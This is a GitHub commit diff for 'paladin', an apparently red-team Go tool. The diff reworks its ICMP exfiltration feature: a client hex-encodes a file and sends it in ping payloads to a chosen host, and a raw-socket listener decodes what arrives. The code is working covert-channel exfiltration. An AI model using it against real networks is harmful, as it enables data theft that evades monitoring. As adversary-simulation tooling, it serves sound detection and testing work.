Merge pull request #16 from Zeerg/v0.3.2

V0.3.2
Zeerg · Aug 31, 2020 · 76cba65 · 76cba65
2 parents 2e3f799 + 4f6efc7
commit 76cba65
Show file tree

Hide file tree

Showing 8 changed files with 50 additions and 47 deletions.
diff --git a/Makefile b/Makefile
@@ -15,6 +15,7 @@ help:
 	@echo 'Usage:'
 	@echo '    make build           Compile the project.'
 	@echo '    make build-fs        Build atomic red team static fs.'
+	@echo '    make build-all       Build all envs.'
 	@echo '    make get-deps        runs dep ensure, mostly used for ci.'
 	@echo '	   make test-release    Test release with goreleaser
 	@echo '    make clean           Clean the directory tree.'
@@ -31,6 +32,13 @@ build:
 	@echo "GOPATH=${GOPATH}"
 	go build -ldflags "-X github.com/Zeerg/paladin/version.GitCommit=${GIT_COMMIT}${GIT_DIRTY} -X github.com/Zeerg/paladin/version.BuildDate=${BUILD_DATE}" -o bin/${BIN_NAME}
 
+build-all:
+	@echo "building ${BIN_NAME} ${VERSION}"
+	@echo "GOPATH=${GOPATH}"
+	GOOS=linux GOARCH=amd64 go build -ldflags "-X github.com/Zeerg/paladin/version.GitCommit=${GIT_COMMIT}${GIT_DIRTY} -X github.com/Zeerg/paladin/version.BuildDate=${BUILD_DATE}" -o bin/linux/${BIN_NAME}
+	GOOS=darwin GOARCH=amd64 go build -ldflags "-X github.com/Zeerg/paladin/version.GitCommit=${GIT_COMMIT}${GIT_DIRTY} -X github.com/Zeerg/paladin/version.BuildDate=${BUILD_DATE}" -o bin/darwin/${BIN_NAME}
+	GOOS=windows GOARCH=amd64 go build -ldflags "-X github.com/Zeerg/paladin/version.GitCommit=${GIT_COMMIT}${GIT_DIRTY} -X github.com/Zeerg/paladin/version.BuildDate=${BUILD_DATE}" -o bin/windows/${BIN_NAME}
+
 build-fs:
 	@echo "building Atomic Red Team Static FS"
 	git clone https://github.com/redcanaryco/atomic-red-team.git art

diff --git a/cmd/common.go b/cmd/common.go
@@ -3,9 +3,9 @@ package cmd
 import (
     "io/ioutil"
     "encoding/hex"
-    
+
     "github.com/Zeerg/paladin/log"
-    
+
 )
 
 func check(e error) {
@@ -22,4 +22,11 @@ func hexEncode(fileName string) []byte {
 	dstEnc := make([]byte, hex.EncodedLen(len(dat)))
 	hex.Encode(dstEnc, dat)
 	return dstEnc
-}
+}
+func hexDecode(bytesObject []byte) string {
+    dst := make([]byte, hex.DecodedLen(len(bytesObject)))
+    n, err := hex.Decode(dst, bytesObject)
+    check(err)
+    encodedMessage := string(dst[:n])
+    return encodedMessage
+}
diff --git a/cmd/exfil.go b/cmd/exfil.go
@@ -8,7 +8,6 @@ import (
 var (
 	dhost string
 	exfilFileName string
-	device string
 	runTime int32
 	outFile string
 	dnsPort int
@@ -59,7 +58,7 @@ var exfilPingReceive = &cobra.Command{
 	Short: "Packet capture ping requests and reassemble files",
 	Long: `Packet capture ping requests and reassemble file`,
 	Run: func(cmd *cobra.Command, args []string) {
-		pingReassemble(outFile, device, runTime)
+		pingListen(outFile, ipListen, runTime)
 	},
 }
 
@@ -79,7 +78,7 @@ func init() {
 	exfilPing.Flags().StringVarP(&exfilFileName, "file", "f", "", "The name of the file to send over ping")
 
 	//Ping Reassemble flags
-	exfilPingReceive.Flags().StringVarP(&device, "device", "i", "", "The Device to listen on")
+	exfilPingReceive.Flags().StringVarP(&ipListen, "ip", "i", "0.0.0.0", "The ip to listen on")
 	exfilPingReceive.Flags().Int32VarP(&runTime, "runTime", "r", 1024, "How long to run the ping listener")
 	exfilPingReceive.Flags().StringVarP(&outFile, "outfile", "o", "out.text", "The destination filename")
 

diff --git a/cmd/ping_client.go b/cmd/ping_client.go
@@ -11,7 +11,7 @@ import (
 
 
 )
-// executePing is a basic ping implementation 
+// executePing is a basic ping implementation
 func executePing(targetIP string, fileBytes []byte) {
 	c, err := icmp.ListenPacket("ip4:icmp", "0.0.0.0")
     check(err)
@@ -33,6 +33,7 @@ func executePing(targetIP string, fileBytes []byte) {
 
 // pingExfil Sends a file over ping to a destination server
 func pingExfil(destination, fileName string) {
-	fileAsHex := hexEncode(fileName)
+    fileAsHex := hexEncode(fileName)
+    log.Println(fileAsHex)
 	executePing(destination, fileAsHex)
-}
+}
diff --git a/cmd/ping_server.go b/cmd/ping_server.go
@@ -1,48 +1,35 @@
 package cmd
 
 import (
-	"fmt"
-	"time"
-    "encoding/hex"
-    "os"
-
-    "github.com/google/gopacket"
-	"github.com/google/gopacket/pcap"
-
+    "golang.org/x/net/icmp"
+    "reflect"
+    "log"
+    "bytes"
 )
+
 var (
-    captureDevice       string = "eth0"
+    ipListen       string = "0.0.0.0"
     captureTime int32 = 1024
     promiscuous  bool   = false
     err          error
-    timeout      time.Duration = 1 * time.Second
-	handle       *pcap.Handle
-	filter 		 string = "icmp"
 )
 
-// pingReassemble takes the payload and reassembles it. 
-func pingReassemble(outFile, captureDevice string, captureTime int32) {
-
-    // Open device
-    handle, err = pcap.OpenLive(captureDevice, captureTime, promiscuous, timeout)
-    check(err)
-	defer handle.Close()
-
-    // Set filter
-    err = handle.SetBPFFilter(filter)
+// pingListen waits for the ping at the address
+func pingListen(outFile, ipListen string, captureTime int32) {
+    // Listen for ping
+    pkt, err := icmp.ListenPacket("ip4:1", ipListen)
     check(err)
-    packetSource := gopacket.NewPacketSource(handle, handle.LinkType())
-    for packet := range packetSource.Packets() {
-		appLayer := packet.ApplicationLayer();
-		payload, err := hex.DecodeString(string(appLayer.Payload()))
-		check(err)
-        fmt.Println(string(payload))
-        f, err := os.OpenFile(outFile, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)
+    // Wait to get request
+	for {
+		buf := make([]byte, 1024)
+		_, addr, _ := pkt.ReadFrom(buf)
+		clientAddr := addr
+		m, err := icmp.ParseMessage(1,buf)
         check(err)
-        defer f.Close()
-        if _, err := f.WriteString(string(payload)); err != nil {
-	        check(err)
-        }
-    }
-
-}
+        datBody := reflect.ValueOf(m.Body).Elem().FieldByName("Data").Bytes()
+        b := bytes.Trim(datBody, "\x00")
+        decodedText := hexDecode(b)
+        log.Println(decodedText)
+        log.Println(clientAddr)
+	}
+}
diff --git a/go.sum b/go.sum
@@ -181,6 +181,7 @@ github.com/juju/ansiterm v0.0.0-20180109212912-720a0952cc2a/go.mod h1:UJSiEoRfvx
 github.com/julienschmidt/httprouter v1.2.0/go.mod h1:SYymIcj16QtmaHHD7aYtjjsJG7VTCxuUUipMqKk8s4w=
 github.com/kisielk/errcheck v1.1.0/go.mod h1:EZBBE59ingxPouuu3KfxchcWSUPOHkagtvWXihfKN4Q=
 github.com/kisielk/gotool v1.0.0/go.mod h1:XhKaO+MFFWcvkIS/tQcRk01m1F5IRFswLeQ+oQHNcck=
+github.com/konsorten/go-windows-terminal-sequences v1.0.1 h1:mweAR1A6xJ3oS2pRaGiHgQ4OO8tzTaLawm8vnODuwDk=
 github.com/konsorten/go-windows-terminal-sequences v1.0.1/go.mod h1:T0+1ngSBFLxvqU3pZ+m/2kptfBszLMUkC4ZK/EgS/cQ=
 github.com/kr/logfmt v0.0.0-20140226030751-b84e30acd515/go.mod h1:+0opPa2QZZtGFBFZlji/RkVcI2GknAs/DXo4wKdlNEc=
 github.com/kr/pretty v0.1.0/go.mod h1:dAy3ld7l9f0ibDNOQOHHMYYIIbhfbHSm3C4ZsoJORNo=

diff --git a/statik/statik.go b/statik/statik.go
diff --git a/version/version.go b/version/version.go
@@ -9,7 +9,7 @@ import (
 var GitCommit string
 
 // Version returns the main version number that is being run at the moment.
-const Version = "0.3.1"
+const Version = "0.3.2"
 
 // BuildDate returns the date the binary was built
 var BuildDate = ""